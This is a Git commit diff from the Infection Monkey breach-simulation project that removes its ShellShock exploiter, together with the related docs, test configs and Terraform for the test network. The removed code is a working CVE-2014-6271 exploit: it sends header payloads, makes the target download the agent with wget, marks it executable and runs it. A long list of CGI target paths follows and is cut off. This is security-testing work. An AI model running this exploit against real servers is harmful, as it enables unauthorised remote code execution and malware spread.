forked from p15670423/monkey
Merge pull request #1735 from guardicore/1733-remove-shellshock-exploit
Remove shellshock exploit
This commit is contained in:
commit
57e6d0208d
|
@ -45,6 +45,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
|||
- MS08-067 (Conficker) exploiter. #1677
|
||||
- Agent bootloader. #1676
|
||||
- Zero Trust integration with ScoutSuite. #1669
|
||||
- ShellShock exploiter. #1733
|
||||
|
||||
### Fixed
|
||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||
|
|
|
@ -46,7 +46,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
|
|||
* SSH
|
||||
* SMB
|
||||
* WMI
|
||||
* Shellshock
|
||||
* Log4Shell
|
||||
* Elastic Search (CVE-2015-1427)
|
||||
* Weblogic server
|
||||
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
||||
|
|
|
@ -26,7 +26,7 @@ You can take a look at [our roadmap](https://github.com/guardicore/monkey/projec
|
|||
|
||||
The best way to find weak spots in a network is by attacking it. The [*Adding Exploits*](./adding-exploits/) page will help you add exploits.
|
||||
|
||||
It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Shellshock.
|
||||
It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Hadoop.
|
||||
|
||||
### Analysis plugins 🔬
|
||||
|
||||
|
|
|
@ -1,11 +0,0 @@
|
|||
---
|
||||
title: "ShellShock"
|
||||
date: 2020-07-14T08:41:32+03:00
|
||||
draft: false
|
||||
tags: ["exploit", "linux"]
|
||||
---
|
||||
### Description
|
||||
|
||||
This exploit, CVE-2014-6271, is based on the [logic in NCC group's GitHub](https://github.com/nccgroup/shocker/blob/master/shocker.py).
|
||||
|
||||
> In GNU Bash (through 4.3), processes trailing strings after function definitions in the values of environment variables allow remote attackers to execute arbitrary code via a crafted environment. This is demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution, AKA "ShellShock."
|
|
@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
|
|||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
|
|
|
@ -1,17 +0,0 @@
|
|||
from copy import copy
|
||||
|
||||
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
|
||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
||||
|
||||
|
||||
class ShellShock(ConfigTemplate):
|
||||
config_values = copy(BaseTemplate.config_values)
|
||||
|
||||
config_values.update(
|
||||
{
|
||||
"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
|
||||
"basic_network.scope.subnet_scan_list": ["10.2.2.8"],
|
||||
"internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
|
||||
"internal.network.tcp_scanner.tcp_target_ports": [],
|
||||
}
|
||||
)
|
|
@ -17,7 +17,6 @@ GCP_TEST_MACHINE_LIST = {
|
|||
"tunneling-12",
|
||||
"weblogic-18",
|
||||
"weblogic-19",
|
||||
"shellshock-8",
|
||||
"zerologon-25",
|
||||
"drupal-28",
|
||||
],
|
||||
|
|
|
@ -20,7 +20,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
|
|||
from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse import (
|
||||
PowerShellCredentialsReuse,
|
||||
)
|
||||
from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
|
||||
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
||||
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
||||
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
||||
|
@ -200,9 +199,6 @@ class TestMonkeyBlackbox:
|
|||
def test_weblogic_exploiter(self, island_client):
|
||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
|
||||
|
||||
def test_shellshock_exploiter(self, island_client):
|
||||
TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellshock_exploiter")
|
||||
|
||||
def test_log4j_solr_exploiter(self, island_client):
|
||||
TestMonkeyBlackbox.run_exploitation_test(
|
||||
island_client, Log4jSolr, "Log4Shell_Solr_exploiter"
|
||||
|
|
|
@ -12,7 +12,6 @@ from envs.monkey_zoo.blackbox.config_templates.log4j_tomcat import Log4jTomcat
|
|||
from envs.monkey_zoo.blackbox.config_templates.mssql import Mssql
|
||||
from envs.monkey_zoo.blackbox.config_templates.performance import Performance
|
||||
from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
|
||||
from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
|
||||
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
||||
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
||||
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
||||
|
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
|
|||
Mssql,
|
||||
Performance,
|
||||
PowerShell,
|
||||
ShellShock,
|
||||
SmbMimikatz,
|
||||
SmbPth,
|
||||
Ssh,
|
||||
|
|
|
@ -11,7 +11,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
|
|||
[Nr. 3 Hadoop](#_Toc526517183)<br>
|
||||
[Nr. 4 Elastic](#_Toc526517184)<br>
|
||||
[Nr. 5 Elastic](#_Toc526517185)<br>
|
||||
[Nr. 8 Shellshock](#_Toc536021461)<br>
|
||||
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
|
||||
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
|
||||
[Nr. 11 SSH key steal](#_Toc526517190)<br>
|
||||
|
@ -326,38 +325,6 @@ Update all requirements using deployment script:<br>
|
|||
</tbody>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<thead>
|
||||
<tr class="header">
|
||||
<th><p><span id="_Toc536021461" class="anchor"></span>Nr. <strong>8</strong> Shellshock</p>
|
||||
<p>(10.2.2.8)</p></th>
|
||||
<th>(Vulnerable)</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
<tr class="odd">
|
||||
<td>OS:</td>
|
||||
<td><strong>Ubuntu 12.04 LTS x64</strong></td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Software:</td>
|
||||
<td>Apache2, bash 4.2.</td>
|
||||
</tr>
|
||||
<tr class="odd">
|
||||
<td>Default server’s port:</td>
|
||||
<td>80</td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Scan results:</td>
|
||||
<td>Machine exploited using Shellshock exploiter</td>
|
||||
</tr>
|
||||
<tr class="odd">
|
||||
<td>Notes:</td>
|
||||
<td>Vulnerable app is under /cgi-bin/test.cgi</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<thead>
|
||||
<tr class="header">
|
||||
|
|
|
@ -15,11 +15,6 @@ data "google_compute_image" "elastic-5" {
|
|||
name = "elastic-5"
|
||||
project = local.monkeyzoo_project
|
||||
}
|
||||
|
||||
data "google_compute_image" "shellshock-8" {
|
||||
name = "shellshock-8"
|
||||
project = local.monkeyzoo_project
|
||||
}
|
||||
data "google_compute_image" "tunneling-9" {
|
||||
name = "tunneling-9"
|
||||
project = local.monkeyzoo_project
|
||||
|
|
|
@ -106,21 +106,6 @@ resource "google_compute_instance_from_template" "elastic-5" {
|
|||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "shellshock-8" {
|
||||
name = "${local.resource_prefix}shellshock-8"
|
||||
source_instance_template = local.default_ubuntu
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
image = data.google_compute_image.shellshock-8.self_link
|
||||
}
|
||||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.8"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-9" {
|
||||
name = "${local.resource_prefix}tunneling-9"
|
||||
source_instance_template = local.default_ubuntu
|
||||
|
|
|
@ -27,7 +27,6 @@
|
|||
"SSHExploiter",
|
||||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"ShellShockExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
|
|
|
@ -1,269 +0,0 @@
|
|||
# Implementation is based on shellshock script provided
|
||||
# https://github.com/nccgroup/shocker/blob/master/shocker.py
|
||||
|
||||
import logging
|
||||
import string
|
||||
from random import SystemRandom
|
||||
|
||||
import requests
|
||||
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||
from infection_monkey.exploit.shellshock_resources import CGI_FILES
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.model import DROPPER_ARG
|
||||
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
|
||||
from infection_monkey.utils.commands import build_monkey_commandline
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
TIMEOUT = 2
|
||||
TEST_COMMAND = "/bin/uname -a"
|
||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||
LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
|
||||
|
||||
|
||||
class ShellShockExploiter(HostExploiter):
|
||||
_attacks = {"Content-type": "() { :;}; echo; "}
|
||||
|
||||
_TARGET_OS_TYPE = ["linux"]
|
||||
_EXPLOITED_SERVICE = "Bash"
|
||||
|
||||
def __init__(self, host):
|
||||
super(ShellShockExploiter, self).__init__(host)
|
||||
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
|
||||
safe_random = SystemRandom()
|
||||
self.success_flag = "".join(
|
||||
safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
|
||||
)
|
||||
|
||||
def _exploit_host(self):
|
||||
# start by picking ports
|
||||
candidate_services = {
|
||||
service: self.host.services[service]
|
||||
for service in self.host.services
|
||||
if ("name" in self.host.services[service])
|
||||
and (self.host.services[service]["name"] == "http")
|
||||
}
|
||||
|
||||
valid_ports = [
|
||||
(port, candidate_services["tcp-" + str(port)]["data"][1])
|
||||
for port in self.HTTP
|
||||
if "tcp-" + str(port) in candidate_services
|
||||
]
|
||||
http_ports = [port[0] for port in valid_ports if not port[1]]
|
||||
https_ports = [port[0] for port in valid_ports if port[1]]
|
||||
|
||||
logger.info(
|
||||
"Scanning %s, ports [%s] for vulnerable CGI pages"
|
||||
% (self.host, ",".join([str(port[0]) for port in valid_ports]))
|
||||
)
|
||||
|
||||
attackable_urls = []
|
||||
# now for each port we want to check the entire URL list
|
||||
for port in http_ports:
|
||||
urls = self.check_urls(self.host.ip_addr, port)
|
||||
attackable_urls.extend(urls)
|
||||
for port in https_ports:
|
||||
urls = self.check_urls(self.host.ip_addr, port, is_https=True)
|
||||
attackable_urls.extend(urls)
|
||||
# now for each URl we want to try and see if it's attackable
|
||||
exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
|
||||
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
|
||||
|
||||
# we want to report all vulnerable URLs even if we didn't succeed
|
||||
self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
|
||||
|
||||
# now try URLs until we install something on victim
|
||||
for _, url, header, exploit in exploitable_urls:
|
||||
logger.info("Trying to attack host %s with %s URL" % (self.host, url))
|
||||
# same attack script as sshexec
|
||||
# for any failure, quit and don't try other URLs
|
||||
if not self.host.os.get("type"):
|
||||
try:
|
||||
uname_os_attack = exploit + "/bin/uname -o"
|
||||
uname_os = self.attack_page(url, header, uname_os_attack)
|
||||
if "linux" in uname_os:
|
||||
self.host.os["type"] = "linux"
|
||||
else:
|
||||
logger.info("SSH Skipping unknown os: %s", uname_os)
|
||||
return False
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
"Error running uname os command on victim %r: (%s)", self.host, exc
|
||||
)
|
||||
return False
|
||||
if not self.host.os.get("machine"):
|
||||
try:
|
||||
uname_machine_attack = exploit + "/bin/uname -m"
|
||||
uname_machine = self.attack_page(url, header, uname_machine_attack)
|
||||
if "" != uname_machine:
|
||||
self.host.os["machine"] = uname_machine.lower().strip()
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
"Error running uname machine command on victim %r: (%s)", self.host, exc
|
||||
)
|
||||
return False
|
||||
|
||||
# copy the monkey
|
||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||
|
||||
src_path = get_target_monkey(self.host)
|
||||
if not src_path:
|
||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
|
||||
if not self._create_lock_file(exploit, url, header):
|
||||
logger.info("Another monkey is running shellshock exploit")
|
||||
return True
|
||||
|
||||
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
|
||||
|
||||
if not http_path:
|
||||
logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
||||
return False
|
||||
|
||||
download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
|
||||
|
||||
download = exploit + download_command
|
||||
self.attack_page(
|
||||
url, header, download
|
||||
) # we ignore failures here since it might take more than TIMEOUT time
|
||||
|
||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
||||
self._remove_lock_file(exploit, url, header)
|
||||
|
||||
if (http_thread.downloads != 1) or (
|
||||
"ELF"
|
||||
not in self.check_remote_file_exists(
|
||||
url, header, exploit, dropper_target_path_linux
|
||||
)
|
||||
):
|
||||
logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||
continue
|
||||
|
||||
# turn the monkey into an executable
|
||||
chmod = "/bin/chmod +x %s" % dropper_target_path_linux
|
||||
run_path = exploit + chmod
|
||||
self.attack_page(url, header, run_path)
|
||||
T1222Telem(ScanStatus.USED, chmod, self.host).send()
|
||||
|
||||
# run the monkey
|
||||
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
|
||||
cmdline += build_monkey_commandline(
|
||||
self.host,
|
||||
get_monkey_depth() - 1,
|
||||
dropper_target_path_linux,
|
||||
)
|
||||
cmdline += " & "
|
||||
run_path = exploit + cmdline
|
||||
self.attack_page(url, header, run_path)
|
||||
|
||||
logger.info(
|
||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||
self._config.dropper_target_path_linux,
|
||||
self.host,
|
||||
cmdline,
|
||||
)
|
||||
|
||||
if not (
|
||||
self.check_remote_file_exists(
|
||||
url, header, exploit, self._config.monkey_log_path_linux
|
||||
)
|
||||
):
|
||||
logger.info("Log file does not exist, monkey might not have run")
|
||||
continue
|
||||
self.add_executed_cmd(cmdline)
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
@classmethod
|
||||
def check_remote_file_exists(cls, url, header, exploit, file_path):
|
||||
"""
|
||||
Checks if a remote file exists and returns the content if so
|
||||
file_path should be fully qualified
|
||||
"""
|
||||
cmdline = "/usr/bin/head -c 4 %s" % file_path
|
||||
run_path = exploit + cmdline
|
||||
resp = cls.attack_page(url, header, run_path)
|
||||
if resp:
|
||||
logger.info("File %s exists on remote host" % file_path)
|
||||
return resp
|
||||
|
||||
def attempt_exploit(self, url, attacks=None):
|
||||
# Flag used to identify whether the exploit has successfully caused the
|
||||
# server to return a useful response
|
||||
|
||||
if not attacks:
|
||||
attacks = self._attacks
|
||||
|
||||
logger.debug("Attack Flag is: %s" % self.success_flag)
|
||||
|
||||
logger.debug("Trying exploit for %s" % url)
|
||||
for header, exploit in list(attacks.items()):
|
||||
attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
|
||||
result = self.attack_page(url, header, attack)
|
||||
if self.success_flag in result:
|
||||
logger.info("URL %s looks vulnerable" % url)
|
||||
return True, url, header, exploit
|
||||
else:
|
||||
logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
||||
return (False,)
|
||||
|
||||
def _create_lock_file(self, exploit, url, header):
|
||||
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
|
||||
return False
|
||||
cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
|
||||
self.attack_page(url, header, cmd)
|
||||
return True
|
||||
|
||||
def _remove_lock_file(self, exploit, url, header):
|
||||
cmd = exploit + "rm %s" % LOCK_HELPER_FILE
|
||||
self.attack_page(url, header, cmd)
|
||||
|
||||
@staticmethod
|
||||
def attack_page(url, header, attack):
|
||||
result = ""
|
||||
try:
|
||||
logger.debug("Header is: %s" % header)
|
||||
logger.debug("Attack is: %s" % attack)
|
||||
r = requests.get( # noqa: DUO123
|
||||
url, headers={header: attack}, verify=False, timeout=TIMEOUT
|
||||
)
|
||||
result = r.content.decode()
|
||||
return result
|
||||
except requests.exceptions.RequestException as exc:
|
||||
logger.debug("Failed to run, exception %s" % exc)
|
||||
return result
|
||||
|
||||
@staticmethod
|
||||
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
|
||||
"""
|
||||
Checks if which urls exist
|
||||
:return: Sequence of URLs to try and attack
|
||||
"""
|
||||
attack_path = "http://"
|
||||
if is_https:
|
||||
attack_path = "https://"
|
||||
attack_path = attack_path + str(host) + ":" + str(port)
|
||||
reqs = []
|
||||
timeout = False
|
||||
attack_urls = [attack_path + url for url in url_list]
|
||||
for u in attack_urls:
|
||||
try:
|
||||
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
|
||||
except requests.Timeout:
|
||||
timeout = True
|
||||
break
|
||||
if timeout:
|
||||
logger.debug(
|
||||
"Some connections timed out while sending request to potentially vulnerable "
|
||||
"urls."
|
||||
)
|
||||
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
|
||||
urls = [resp.url for resp in valid_resps]
|
||||
|
||||
return urls
|
|
@ -1,408 +0,0 @@
|
|||
# resource for shellshock attack
|
||||
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
||||
|
||||
CGI_FILES = (
|
||||
r"/",
|
||||
r"/admin.cgi",
|
||||
r"/administrator.cgi",
|
||||
r"/agora.cgi",
|
||||
r"/aktivate/cgi-bin/catgy.cgi",
|
||||
r"/analyse.cgi",
|
||||
r"/apps/web/vs_diag.cgi",
|
||||
r"/axis-cgi/buffer/command.cgi",
|
||||
r"/b2-include/b2edit.showposts.php",
|
||||
r"/bandwidth/index.cgi",
|
||||
r"/bigconf.cgi",
|
||||
r"/cartcart.cgi",
|
||||
r"/cart.cgi",
|
||||
r"/ccbill/whereami.cgi",
|
||||
r"/cgi-bin/14all-1.1.cgi",
|
||||
r"/cgi-bin/14all.cgi",
|
||||
r"/cgi-bin/a1disp3.cgi",
|
||||
r"/cgi-bin/a1stats/a1disp3.cgi",
|
||||
r"/cgi-bin/a1stats/a1disp4.cgi",
|
||||
r"/cgi-bin/addbanner.cgi",
|
||||
r"/cgi-bin/add_ftp.cgi",
|
||||
r"/cgi-bin/adduser.cgi",
|
||||
r"/cgi-bin/admin/admin.cgi",
|
||||
r"/cgi-bin/admin.cgi",
|
||||
r"/cgi-bin/admin/getparam.cgi",
|
||||
r"/cgi-bin/adminhot.cgi",
|
||||
r"/cgi-bin/admin.pl",
|
||||
r"/cgi-bin/admin/setup.cgi",
|
||||
r"/cgi-bin/adminwww.cgi",
|
||||
r"/cgi-bin/af.cgi",
|
||||
r"/cgi-bin/aglimpse.cgi",
|
||||
r"/cgi-bin/alienform.cgi",
|
||||
r"/cgi-bin/AnyBoard.cgi",
|
||||
r"/cgi-bin/architext_query.cgi",
|
||||
r"/cgi-bin/astrocam.cgi",
|
||||
r"/cgi-bin/AT-admin.cgi",
|
||||
r"/cgi-bin/AT-generate.cgi",
|
||||
r"/cgi-bin/auction/auction.cgi",
|
||||
r"/cgi-bin/auktion.cgi",
|
||||
r"/cgi-bin/ax-admin.cgi",
|
||||
r"/cgi-bin/ax.cgi",
|
||||
r"/cgi-bin/axs.cgi",
|
||||
r"/cgi-bin/badmin.cgi",
|
||||
r"/cgi-bin/banner.cgi",
|
||||
r"/cgi-bin/bannereditor.cgi",
|
||||
r"/cgi-bin/bb-ack.sh",
|
||||
r"/cgi-bin/bb-histlog.sh",
|
||||
r"/cgi-bin/bb-hist.sh",
|
||||
r"/cgi-bin/bb-hostsvc.sh",
|
||||
r"/cgi-bin/bb-replog.sh",
|
||||
r"/cgi-bin/bb-rep.sh",
|
||||
r"/cgi-bin/bbs_forum.cgi",
|
||||
r"/cgi-bin/bigconf.cgi",
|
||||
r"/cgi-bin/bizdb1-search.cgi",
|
||||
r"/cgi-bin/blog/mt-check.cgi",
|
||||
r"/cgi-bin/blog/mt-load.cgi",
|
||||
r"/cgi-bin/bnbform.cgi",
|
||||
r"/cgi-bin/book.cgi",
|
||||
r"/cgi-bin/boozt/admin/index.cgi",
|
||||
r"/cgi-bin/bsguest.cgi",
|
||||
r"/cgi-bin/bslist.cgi",
|
||||
r"/cgi-bin/build.cgi",
|
||||
r"/cgi-bin/bulk/bulk.cgi",
|
||||
r"/cgi-bin/cached_feed.cgi",
|
||||
r"/cgi-bin/cachemgr.cgi",
|
||||
r"/cgi-bin/calendar/index.cgi",
|
||||
r"/cgi-bin/cartmanager.cgi",
|
||||
r"/cgi-bin/cbmc/forums.cgi",
|
||||
r"/cgi-bin/ccvsblame.cgi",
|
||||
r"/cgi-bin/c_download.cgi",
|
||||
r"/cgi-bin/cgforum.cgi",
|
||||
r"/cgi-bin/.cgi",
|
||||
r"/cgi-bin/cgi_process",
|
||||
r"/cgi-bin/classified.cgi",
|
||||
r"/cgi-bin/classifieds.cgi",
|
||||
r"/cgi-bin/classifieds/classifieds.cgi",
|
||||
r"/cgi-bin/classifieds/index.cgi",
|
||||
r"/cgi-bin/.cobalt/alert/service.cgi",
|
||||
r"/cgi-bin/.cobalt/message/message.cgi",
|
||||
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
|
||||
r"/cgi-bin/commandit.cgi",
|
||||
r"/cgi-bin/commerce.cgi",
|
||||
r"/cgi-bin/common/listrec.pl",
|
||||
r"/cgi-bin/compatible.cgi",
|
||||
r"/cgi-bin/Count.cgi",
|
||||
r"/cgi-bin/csChatRBox.cgi",
|
||||
r"/cgi-bin/csGuestBook.cgi",
|
||||
r"/cgi-bin/csLiveSupport.cgi",
|
||||
r"/cgi-bin/CSMailto.cgi",
|
||||
r"/cgi-bin/CSMailto/CSMailto.cgi",
|
||||
r"/cgi-bin/csNews.cgi",
|
||||
r"/cgi-bin/csNewsPro.cgi",
|
||||
r"/cgi-bin/csPassword.cgi",
|
||||
r"/cgi-bin/csPassword/csPassword.cgi",
|
||||
r"/cgi-bin/csSearch.cgi",
|
||||
r"/cgi-bin/csv_db.cgi",
|
||||
r"/cgi-bin/cvsblame.cgi",
|
||||
r"/cgi-bin/cvslog.cgi",
|
||||
r"/cgi-bin/cvsquery.cgi",
|
||||
r"/cgi-bin/cvsqueryform.cgi",
|
||||
r"/cgi-bin/day5datacopier.cgi",
|
||||
r"/cgi-bin/day5datanotifier.cgi",
|
||||
r"/cgi-bin/db_manager.cgi",
|
||||
r"/cgi-bin/dbman/db.cgi",
|
||||
r"/cgi-bin/dcforum.cgi",
|
||||
r"/cgi-bin/dcshop.cgi",
|
||||
r"/cgi-bin/dfire.cgi",
|
||||
r"/cgi-bin/diagnose.cgi",
|
||||
r"/cgi-bin/dig.cgi",
|
||||
r"/cgi-bin/directorypro.cgi",
|
||||
r"/cgi-bin/download.cgi",
|
||||
r"/cgi-bin/e87_Ba79yo87.cgi",
|
||||
r"/cgi-bin/emu/html/emumail.cgi",
|
||||
r"/cgi-bin/emumail.cgi",
|
||||
r"/cgi-bin/emumail/emumail.cgi",
|
||||
r"/cgi-bin/enter.cgi",
|
||||
r"/cgi-bin/environ.cgi",
|
||||
r"/cgi-bin/ezadmin.cgi",
|
||||
r"/cgi-bin/ezboard.cgi",
|
||||
r"/cgi-bin/ezman.cgi",
|
||||
r"/cgi-bin/ezshopper2/loadpage.cgi",
|
||||
r"/cgi-bin/ezshopper3/loadpage.cgi",
|
||||
r"/cgi-bin/ezshopper/loadpage.cgi",
|
||||
r"/cgi-bin/ezshopper/search.cgi",
|
||||
r"/cgi-bin/faqmanager.cgi",
|
||||
r"/cgi-bin/FileSeek2.cgi",
|
||||
r"/cgi-bin/FileSeek.cgi",
|
||||
r"/cgi-bin/finger.cgi",
|
||||
r"/cgi-bin/flexform.cgi",
|
||||
r"/cgi-bin/fom.cgi",
|
||||
r"/cgi-bin/fom/fom.cgi",
|
||||
r"/cgi-bin/FormHandler.cgi",
|
||||
r"/cgi-bin/FormMail.cgi",
|
||||
r"/cgi-bin/gbadmin.cgi",
|
||||
r"/cgi-bin/gbook/gbook.cgi",
|
||||
r"/cgi-bin/generate.cgi",
|
||||
r"/cgi-bin/getdoc.cgi",
|
||||
r"/cgi-bin/gH.cgi",
|
||||
r"/cgi-bin/gm-authors.cgi",
|
||||
r"/cgi-bin/gm.cgi",
|
||||
r"/cgi-bin/gm-cplog.cgi",
|
||||
r"/cgi-bin/guestbook.cgi",
|
||||
r"/cgi-bin/handler",
|
||||
r"/cgi-bin/handler.cgi",
|
||||
r"/cgi-bin/handler/netsonar",
|
||||
r"/cgi-bin/hitview.cgi",
|
||||
r"/cgi-bin/hsx.cgi",
|
||||
r"/cgi-bin/html2chtml.cgi",
|
||||
r"/cgi-bin/html2wml.cgi",
|
||||
r"/cgi-bin/htsearch.cgi",
|
||||
r"/cgi-bin/hw.sh", # testing
|
||||
r"/cgi-bin/icat",
|
||||
r"/cgi-bin/if/admin/nph-build.cgi",
|
||||
r"/cgi-bin/ikonboard/help.cgi",
|
||||
r"/cgi-bin/ImageFolio/admin/admin.cgi",
|
||||
r"/cgi-bin/imageFolio.cgi",
|
||||
r"/cgi-bin/index.cgi",
|
||||
r"/cgi-bin/infosrch.cgi",
|
||||
r"/cgi-bin/jammail.pl",
|
||||
r"/cgi-bin/journal.cgi",
|
||||
r"/cgi-bin/lastlines.cgi",
|
||||
r"/cgi-bin/loadpage.cgi",
|
||||
r"/cgi-bin/login.cgi",
|
||||
r"/cgi-bin/logit.cgi",
|
||||
r"/cgi-bin/log-reader.cgi",
|
||||
r"/cgi-bin/lookwho.cgi",
|
||||
r"/cgi-bin/lwgate.cgi",
|
||||
r"/cgi-bin/MachineInfo",
|
||||
r"/cgi-bin/MachineInfo",
|
||||
r"/cgi-bin/magiccard.cgi",
|
||||
r"/cgi-bin/mail/emumail.cgi",
|
||||
r"/cgi-bin/maillist.cgi",
|
||||
r"/cgi-bin/mailnews.cgi",
|
||||
r"/cgi-bin/mail/nph-mr.cgi",
|
||||
r"/cgi-bin/main.cgi",
|
||||
r"/cgi-bin/main_menu.pl",
|
||||
r"/cgi-bin/man.sh",
|
||||
r"/cgi-bin/mini_logger.cgi",
|
||||
r"/cgi-bin/mmstdod.cgi",
|
||||
r"/cgi-bin/moin.cgi",
|
||||
r"/cgi-bin/mojo/mojo.cgi",
|
||||
r"/cgi-bin/mrtg.cgi",
|
||||
r"/cgi-bin/mt.cgi",
|
||||
r"/cgi-bin/mt/mt.cgi",
|
||||
r"/cgi-bin/mt/mt-check.cgi",
|
||||
r"/cgi-bin/mt/mt-load.cgi",
|
||||
r"/cgi-bin/mt-static/mt-check.cgi",
|
||||
r"/cgi-bin/mt-static/mt-load.cgi",
|
||||
r"/cgi-bin/musicqueue.cgi",
|
||||
r"/cgi-bin/myguestbook.cgi",
|
||||
r"/cgi-bin/.namazu.cgi",
|
||||
r"/cgi-bin/nbmember.cgi",
|
||||
r"/cgi-bin/netauth.cgi",
|
||||
r"/cgi-bin/netpad.cgi",
|
||||
r"/cgi-bin/newsdesk.cgi",
|
||||
r"/cgi-bin/nlog-smb.cgi",
|
||||
r"/cgi-bin/nph-emumail.cgi",
|
||||
r"/cgi-bin/nph-exploitscanget.cgi",
|
||||
r"/cgi-bin/nph-publish.cgi",
|
||||
r"/cgi-bin/nph-test.cgi",
|
||||
r"/cgi-bin/pagelog.cgi",
|
||||
r"/cgi-bin/pbcgi.cgi",
|
||||
r"/cgi-bin/perlshop.cgi",
|
||||
r"/cgi-bin/pfdispaly.cgi",
|
||||
r"/cgi-bin/pfdisplay.cgi",
|
||||
r"/cgi-bin/phf.cgi",
|
||||
r"/cgi-bin/photo/manage.cgi",
|
||||
r"/cgi-bin/photo/protected/manage.cgi",
|
||||
r"/cgi-bin/php-cgi",
|
||||
r"/cgi-bin/php.cgi",
|
||||
r"/cgi-bin/php.fcgi",
|
||||
r"/cgi-bin/ping.sh",
|
||||
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
|
||||
r"/cgi-bin/pollssi.cgi",
|
||||
r"/cgi-bin/postcards.cgi",
|
||||
r"/cgi-bin/powerup/r.cgi",
|
||||
r"/cgi-bin/printenv",
|
||||
r"/cgi-bin/probecontrol.cgi",
|
||||
r"/cgi-bin/profile.cgi",
|
||||
r"/cgi-bin/publisher/search.cgi",
|
||||
r"/cgi-bin/quickstore.cgi",
|
||||
r"/cgi-bin/quizme.cgi",
|
||||
r"/cgi-bin/ratlog.cgi",
|
||||
